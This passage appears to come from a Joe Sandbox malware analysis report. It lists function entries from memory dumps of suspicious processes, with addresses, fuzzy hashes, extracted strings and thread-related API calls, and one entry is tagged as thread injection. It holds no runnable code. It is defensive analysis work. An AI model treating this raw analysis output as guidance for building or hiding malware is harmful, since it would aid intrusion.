Instruction Fuzzy Hash: DEE04F3681E2C98FF771EF108E560EC7F70BF11384F6A01EBD51987192EB296A189652

Function 00007FF84959D427 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa338f200561165a6c3085338d3ba75f83e77cdbc1ca81ffc1e19d176b7739d
Instruction ID: 704f869680f387df31c11781de1905de1bd1973417dcda9757efa328c57cf734
Opcode Fuzzy Hash: eaa338f200561165a6c3085338d3ba75f83e77cdbc1ca81ffc1e19d176b7739d
Instruction Fuzzy Hash: 3FE01211E0D2C28FF7765B345D605787FD09F0B3C87660AB9D15E9B2C3D99538049711

Function 00007FF848E9352F Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3446c91fa6359a97e0c82b05bc6409d70efd09c66479bfef8928a9de9b9b42f3
Instruction ID: 3620c5ced7446f6b12f1c6e0febe257d57ff39341f6fbe5bc021d348d2a1a5dc
Opcode Fuzzy Hash: 3446c91fa6359a97e0c82b05bc6409d70efd09c66479bfef8928a9de9b9b42f3
Instruction Fuzzy Hash: E1E0EC70D0991D9EE775EA18DC903E97671EB84315F1042F5800E96189CA341E828F80

Function 00007FF849591DCB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
Instruction ID: 975bc405a72ff7f58ff1edd9084ca05f0e8470a30ebf7ccba6a5caef0da938f2
Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
Instruction Fuzzy Hash: D6D0C914B1D6EB8DF6397F418960E3951956F01389E32403EC17F819C1CE2CB5016215

Function 00007FF84959DEFB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
Instruction ID: 1cb5dc69c692584d5fc2a98f51da72e93af739a075a0b612925f887f6e88bf90
Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
Instruction Fuzzy Hash: 85D01220A1D5C38DF7387E01CE2223E65A15F4238CE36003EE07F429C1CD1C78017A11

Function 00007FF8495912DF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2251466892.00007FF849590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849590000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
Instruction ID: 5a059c1133121bd8009b678d37dfd3208b5d3bfb59b497f1d0288c36a6fa72cd
Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
Instruction Fuzzy Hash: 86C04C10F0D2D39FFA317A644C61A3826911F0B388B660A71D11A8A3C3D858B8445651

Non-executed Functions

Function 00007FF84903B7C5 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7e26661d562f86fa5596e82ef91eaa7f0b6858be83bb676246a7734c04b017
Instruction ID: cb23af0f9e202f632862b9b12add299b023d8482ec39a830b9bd0bd227f75172
Opcode Fuzzy Hash: 3b7e26661d562f86fa5596e82ef91eaa7f0b6858be83bb676246a7734c04b017
Instruction Fuzzy Hash: DF415830D0CA8D8FCF55EF68C891AADBBB1FF5A344F2401AAD418D7282CB35A945CB41

Function 00007FF84904340F Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2243679796.00007FF849030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff849030000_Providerbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8a3733e8af488a75a4cd3bf0e3c0b1184f6dd9f0d54d6cfeb38d661fa60b29
Instruction ID: 38428c2373bd7d0c9ef459a1674d533c5f4ccfa5a826fb25affea467d0d876e3
Opcode Fuzzy Hash: 2c8a3733e8af488a75a4cd3bf0e3c0b1184f6dd9f0d54d6cfeb38d661fa60b29
Instruction Fuzzy Hash: 9431D56698D5E22EE71AB778F4920F53F50EF42279B1C91BAD0C84C053CE19644B8AA8

Function 00007FF848E909B0 Relevance: 5.2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FF848E90B56
!k9, xrefs: 00007FF848E90B4E
"s9, xrefs: 00007FF848E90B46
#{9, xrefs: 00007FF848E90B3E

Memory Dump Source

Source File: 00000005.00000002.2241317098.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848e90000_Providerbroker.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
Instruction ID: 9f798cc87b1f9d7a2e81fcf049149f913ebd09ac2b2a9ccfb6ae0af8183cbd58
Opcode Fuzzy Hash: 6a5dbac14c5d11ddaec2a0c634106d08482b247298901b981f54d69e8ad9f73c
Instruction Fuzzy Hash: 65418CD2ACA9237DE10E36FDB4021F96B44EF813B9F4C9677E04C890934F5960958AED

Analysis Process: BSlvAOjamepaXWJMhY.exePID: 5148, Parent PID: 3568COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	75%
Signature Coverage:	0%
Total number of Nodes:	12
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F20D68 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f787c6d5601e852e4e45fd1d28b259f923328153e797c3a23fe6baa40fa9d0c8
Instruction ID: 1d4ff07b30387d0b0ef83e402ed4381861260f51176eeda41504998925918217
Opcode Fuzzy Hash: f787c6d5601e852e4e45fd1d28b259f923328153e797c3a23fe6baa40fa9d0c8
Instruction Fuzzy Hash: D9A1B9B1918A9A8FE784EB6CD8583AABFE1FF95350F0041BEC009D72D2DB791855CB50

Function 00007FF8496309A8 Relevance: 3.1, Strings: 2, Instructions: 637
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`6wI, xrefs: 00007FF849639A1D
8^cI, xrefs: 00007FF849639A37

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: 8^cI$`6wI
API String ID: 0-3787090860
Opcode ID: 648d3ba6c370ae34b9ff9df124e89c9f7ae8117ec8585e0352c347a569b7fbb3
Instruction ID: 172a8b345297359528bb04616dbd638b98aec341736c5a574aefa2ce7b29bc1d
Opcode Fuzzy Hash: 648d3ba6c370ae34b9ff9df124e89c9f7ae8117ec8585e0352c347a569b7fbb3
Instruction Fuzzy Hash: EA224632C1F6D69FE375BF68A8650F67FA0EF12698B0801B7D08D8E093DE1D64498359

Function 00007FF84962C784 Relevance: 2.8, Strings: 2, Instructions: 313
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PlI, xrefs: 00007FF84962CB59
\^H, xrefs: 00007FF84962C7D1

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: PlI$\^H
API String ID: 0-1564205966
Opcode ID: 6a3b122da551d9071ebfa4163f42d71bd36df28e943b5a729f7b22d0b5bd05c5
Instruction ID: e65063dd90bd5bc587054aaca90d215888bb61fa4cf9433fb37551f445177a3d
Opcode Fuzzy Hash: 6a3b122da551d9071ebfa4163f42d71bd36df28e943b5a729f7b22d0b5bd05c5
Instruction Fuzzy Hash: 69A19F35E0DACA8FE7A5FF2888646B87BE1EF55341F4941FAC00DCB192DE2C98098751

Function 00007FF84962E542 Relevance: 1.8, Strings: 1, Instructions: 554
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FF84962EA92

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3886531f680199845e5314f3ec6b4447abaf1b96f09b1460e7266f7eeeb9c4bd
Instruction ID: 9a82542aef454b4f29387b1c505608b6bf9bbe0d458c24edd8a9f6dcf5ad812d
Opcode Fuzzy Hash: 3886531f680199845e5314f3ec6b4447abaf1b96f09b1460e7266f7eeeb9c4bd
Instruction Fuzzy Hash: F412A330D1CA8A9FE76AFF68C4596B9BBA0FF55340F14417AD44EC7682DB38A841CB50

Function 00007FF84962FCC2 Relevance: 1.7, Strings: 1, Instructions: 498
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HtbI, xrefs: 00007FF849630064

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: HtbI
API String ID: 0-1960288083
Opcode ID: a94eaafdeaba3d2a79d43fa3bfed1fbb8aa5517b6bb6a9405f0199965f787a78
Instruction ID: 2408fc2b4bcfbc815a735521fad2432e070b8c123b6f97a1fefef8cd77305152
Opcode Fuzzy Hash: a94eaafdeaba3d2a79d43fa3bfed1fbb8aa5517b6bb6a9405f0199965f787a78
Instruction Fuzzy Hash: 3E02D030A5DA8A8FE379FF28D4905B977E0FF45380B54057EC48EC7686DB29B8468B41

Function 00007FF8490CEA60 Relevance: 1.7, APIs: 1, Instructions: 162
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FF8490CEB61

Memory Dump Source

Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
Instruction ID: 9a065a1edecfa713ab018a3b6cdac50479818929f73790221a6d4d3baacc9a6f
Opcode Fuzzy Hash: 4440b9fca93dee43d99ac15c0c72a1c9c9925ebd855cd9a46a8c6b54a6b86ce4
Instruction Fuzzy Hash: 37517C7090D78C8FDB59DFA8C858AE9BFF0EF56310F0441ABD049D7252CA79A846CB11

Function 00007FF8490CD1FD Relevance: 1.6, APIs: 1, Instructions: 139
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SuspendThread.KERNEL32 ref: 00007FF8490CD2D1

Memory Dump Source

Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
Instruction ID: b5f0e6ce96a49fd185eb0a6ed9b4aeaddb4db48d7cac1a813b1624ce9d70519b
Opcode Fuzzy Hash: b3a00483c1683e00a38fb35b0e2b9fc5e68c7d5b6559266c763a14c23809b6fc
Instruction Fuzzy Hash: 18412A70D0864D8FDB58DF98D885AADBBF0FB5A310F10416AD049E7252DB74A885CB45

Function 00007FF8490D0915 Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF8490D09E2

Memory Dump Source

Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
Instruction ID: df51b25a5382804e78af61bb34bdf9f71a3e5f161967c29ff04a1f010c1be989
Opcode Fuzzy Hash: a70208a3f6885741f54831d46b35889b8bb970050a5aa909cd03cc49e2bd0c3e
Instruction Fuzzy Hash: 0541197090865C8FDB98EF98D889BEDBBF0FB59310F10416ED04DE7252DA74A885CB54

Function 00007FF84962C399 Relevance: 1.5, Strings: 1, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H{uI, xrefs: 00007FF84962C50C

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: H{uI
API String ID: 0-2047368440
Opcode ID: b65dd62ea32a3ba9cadaff0196e29b09f4b1f07655ccd17c3a56ec2c82681e38
Instruction ID: ae53f84f88657c8ac0e208b83f9abfa92873dd440d91cb0ad61ebf0f7befca2f
Opcode Fuzzy Hash: b65dd62ea32a3ba9cadaff0196e29b09f4b1f07655ccd17c3a56ec2c82681e38
Instruction Fuzzy Hash: 89712171C1CA8E9FE760FFA8D8466FE7BB0FF44390F1401BAD049D7192EA2868458790

Function 00007FF84962064B Relevance: 1.5, Strings: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X;`I, xrefs: 00007FF84962068E

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: X;`I
API String ID: 0-1832804531
Opcode ID: 5e512ac0e4cf56c804f09fc904662c0b2e40e2531d2c2178a1ad23513a6201f7
Instruction ID: 3d1f9d2cb941b4a381ae800234d9a2b00c4dd7f5f4f250018f8d68a469e0717c
Opcode Fuzzy Hash: 5e512ac0e4cf56c804f09fc904662c0b2e40e2531d2c2178a1ad23513a6201f7
Instruction Fuzzy Hash: 9161E130D1D68E9FEB69FF6488546BDBBA1FF59380F1404BAD00ED7182EE296841CB51

Function 00007FF8496228E8 Relevance: 1.4, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FF849622962

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c97d91a498b2393869562999bf7e620aef845549adea3d8b024c93c05c347bd9
Instruction ID: 03e3b4ebc9f3b202e8e792ec54055c37327271101c51635df53d5f901ccc4806
Opcode Fuzzy Hash: c97d91a498b2393869562999bf7e620aef845549adea3d8b024c93c05c347bd9
Instruction Fuzzy Hash: 25515B30D0C68A9FDB6DEFA8C4A55BDB7B1FF58340F1444BAC00AE7286DA386945CB51

Function 00007FF8490CEBC9 Relevance: 1.4, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF8490CECA1

Memory Dump Source

Source File: 0000000C.00000002.3398069146.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff8490c0000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1cdbbf0d9ab732c929d636e5620bec61523cf803b43734b845f96d6bdf660152
Instruction ID: 0c5d71e2dc556598a4b87e1a1802be80e483f2034affb7f84c184be1f74dbb2c
Opcode Fuzzy Hash: 1cdbbf0d9ab732c929d636e5620bec61523cf803b43734b845f96d6bdf660152
Instruction Fuzzy Hash: 7A416C70D0865C8FDB58DFA8D889BEDBBF0FB56311F1041AAD049E7292DA34A885CB01

Function 00007FF84962E99A Relevance: 1.4, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FF84962EA92

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 58ea7a75cf58478dfe791b384f6916706bb5dcb8a94649d91916f56411e3811d
Instruction ID: 05e8f303e781e3e4b68aba75416f0da9a5dab89b228d736c7d13db772c0089c9
Opcode Fuzzy Hash: 58ea7a75cf58478dfe791b384f6916706bb5dcb8a94649d91916f56411e3811d
Instruction Fuzzy Hash: BE416D30D0D59A9FDB6AEFA8C4595BDBBB1FF54341F0441BAC00AE7292CA386905CB50

Function 00007FF84962C3E3 Relevance: 1.4, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H{uI, xrefs: 00007FF84962C50C

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: H{uI
API String ID: 0-2047368440
Opcode ID: c7410bac060df87b8d114a9ca0323139149ad5dace8fc44e8c5d39f5c53fc0fd
Instruction ID: a779033d965441473872c76602d9327e0fbbb0fbd13a84c7f83a49ed87522f34
Opcode Fuzzy Hash: c7410bac060df87b8d114a9ca0323139149ad5dace8fc44e8c5d39f5c53fc0fd
Instruction Fuzzy Hash: 52313975D1C89A9EEBA4FF5894855BEBBB1FF58390F6000B5D00AE3295DE3868418740

Function 00007FF84962C428 Relevance: 1.4, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H{uI, xrefs: 00007FF84962C50C

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: H{uI
API String ID: 0-2047368440
Opcode ID: c58afd42bb2541a772456c72071b77fc09a3a1f5842e3c36f2fb04631cb12eab
Instruction ID: b548f203da6051da1bdc21ca5289efd7e4f18e9834729622bc38a0b18f46632a
Opcode Fuzzy Hash: c58afd42bb2541a772456c72071b77fc09a3a1f5842e3c36f2fb04631cb12eab
Instruction Fuzzy Hash: 03314975D1C95E9EEBA4FF98C8415FEBBB1FF98390F500075D10AE2295DE3868418780

Function 00007FF848F21E9C Relevance: 1.3, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00007FF848F21EC9

Memory Dump Source

Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 82d321d7f41d7a0fe5fd5843be7f610efd70d1eeaf4a99dbe828452d87362f10
Instruction ID: fa2197b71ce4e882b947dbc83968a788d07adf60666a6c4bde5448cea470ec97
Opcode Fuzzy Hash: 82d321d7f41d7a0fe5fd5843be7f610efd70d1eeaf4a99dbe828452d87362f10
Instruction Fuzzy Hash: 44E0EC70D9852F8AEB64EB60C8557F9B2A1EF94340F0181FB802FE2595CF752A859E41

Function 00007FF84962AD10 Relevance: .7, Instructions: 696COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565dfa70bae285dd1b3b6ee1150c1fef899f2d990432b20e9c3958de94d7a880
Instruction ID: 882fc2b53a0e16204eccfafd40df291cda4dbc2d61a5e67be97f36f5fc9ee05d
Opcode Fuzzy Hash: 565dfa70bae285dd1b3b6ee1150c1fef899f2d990432b20e9c3958de94d7a880
Instruction Fuzzy Hash: FE32A430A1CA598FDBA8FF18D899AB873E2FF55350F5441B9D05EC7292DE24AC45CB80

Function 00007FF849622B5F Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed589cb02c51bf1a54c304d1cd9eb09895d37dd6d9807bc95a459bc3031f37e8
Instruction ID: 2f0b956e65f6fd9a8870c1058fe2c087b41ede3c1ac87e9033d0763801ba1313
Opcode Fuzzy Hash: ed589cb02c51bf1a54c304d1cd9eb09895d37dd6d9807bc95a459bc3031f37e8
Instruction Fuzzy Hash: D5E1A13091C6968FEB6DEF18C4D06B577A1FF45350B5449BDD84A8B68FCA38E881CB81

Function 00007FF849623BA1 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d08aa08d222e81c3b0bf26698c099ecf7fffbc57d54f151123e907ddf2b3593
Instruction ID: 812943232767584b2f2252e4cc4104899498c36b091cdaae753b95f00353cd5a
Opcode Fuzzy Hash: 1d08aa08d222e81c3b0bf26698c099ecf7fffbc57d54f151123e907ddf2b3593
Instruction Fuzzy Hash: FDD1D230A1CB868FE378FF28D49597577E1FF44744B14497EC48A87682DB29B8468B82

Function 00007FF84962BB37 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28890b3ef00bf5b096fba2bcbef43216841520ae32aed5a89968bb616ee700f1
Instruction ID: 9e16909e8cc25ccd6038b5f7e10605e76b4b61ef9201b5df092ea92b243cf705
Opcode Fuzzy Hash: 28890b3ef00bf5b096fba2bcbef43216841520ae32aed5a89968bb616ee700f1
Instruction Fuzzy Hash: 1841F132D1EAAADEF3A5BF7864511F977A4EF16394F18057AD04DCA1C3CE2C28408789

Function 00007FF849670958 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1855ec65ada2fe1d35071c5eb1333fe6d5951954e2d5480c75390a4b5000522d
Instruction ID: 7d9ee8cebf8ef8d63e69461ac7a6ea20915133b23328466e5fa691200dfa3f9e
Opcode Fuzzy Hash: 1855ec65ada2fe1d35071c5eb1333fe6d5951954e2d5480c75390a4b5000522d
Instruction Fuzzy Hash: A7D1B17091C6968FEB69DF58C4D06B477A1FF49314F5446F9C84ACB28BCA38B881CB90

Function 00007FF849622B7F Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293b2deae83cb473c0357860a44869b2b9a9337a190dddcd60b2f92af3cdc6f8
Instruction ID: 7ec5ec4208acc93620427dca826ab895466dc95b47c1eb10a328698fca9e6388
Opcode Fuzzy Hash: 293b2deae83cb473c0357860a44869b2b9a9337a190dddcd60b2f92af3cdc6f8
Instruction Fuzzy Hash: C6C18C3051C6868FEB2DEF18C4D05B537A1FF45355B5449BDD89A8B68FCA38E881CB81

Function 00007FF849622412 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699aa3d09c0267e7c3395e8a55ac23b9b48733004ddf53be0528bd0f207d7185
Instruction ID: d6caa05051769836edba351aca97e06a2e43bfd391dd3210b98a0c922f7500b2
Opcode Fuzzy Hash: 699aa3d09c0267e7c3395e8a55ac23b9b48733004ddf53be0528bd0f207d7185
Instruction Fuzzy Hash: 4DB1C030A1DA869FE75DFF28C0A06B1B7A1FF59340F544579C04EC7A8ADB28B851CB91

Function 00007FF849869A44 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d8c8c5589ae0c63402fd20e432b66ff8b87eec976e19aedb963d51e8ab1f65
Instruction ID: b870812eb5e44ae92146df732eb0dbe624cf4eec12bdd1b3845ff954858134dd
Opcode Fuzzy Hash: 00d8c8c5589ae0c63402fd20e432b66ff8b87eec976e19aedb963d51e8ab1f65
Instruction Fuzzy Hash: 68B1B570A189698FDBA5EF18C895BE9B7B1FB99341F4041E9D00DE7291DE386E80CF41

Function 00007FF84962DA86 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

